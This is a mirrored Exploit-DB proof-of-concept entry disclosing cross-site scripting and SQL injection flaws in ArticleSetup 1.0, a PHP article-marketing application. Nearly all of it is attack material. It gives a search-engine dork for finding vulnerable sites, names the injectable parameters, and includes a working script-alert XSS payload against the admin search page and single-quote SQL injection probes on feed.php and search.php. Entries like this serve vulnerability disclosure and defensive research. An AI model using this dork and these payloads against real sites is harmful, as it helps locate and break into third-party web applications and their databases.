ArticleSetup – Multiple Vulnerabilities

• Exploit Database
• 12 阅读

• 作者： DevilScreaM
  日期： 2013-09-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/28564/

• #Exploit Title 		: ArticleSetup Multiple Vulnerabilities
  #Author 		: DevilScreaM
  #Date 		: 21/09/2013
  #Category		: Web Applications 
  #Vendor 		: http://www.articlesetup.com/
  #Version 		: 1.0
  
  #Dork 			
  intext:Powered By Article Marketing
  
  #Vulnerability	: Cross Site Scripting , SQL Injection
  #Tested On 		: Windows 7, Ubuntu (Mozila & Chrome)
  #Greetz : Newbie-Security.or.id, Banjarmasin Hacker, Borneo Hacker
  
  
  Cross Site Scripting
  
  http://site-target/search.php?s=[XSS]
  
  
  #XSS at Page Admin
  
  http://site-target/admin/search.php?s=<script>alert('DevilScreaM')</script>
  
  
  ===================================================================================
  
  SQL Injection Vulnerability
  
  http://site-target/feed.php?cat=[SQL Injection]
  http://site-target/search.php?s=[SQL Injection]
  
  Example
  
  http://site-target/feed.php?cat=100'
  http://site-target/search.php?s=123'
  
  ====================================================================================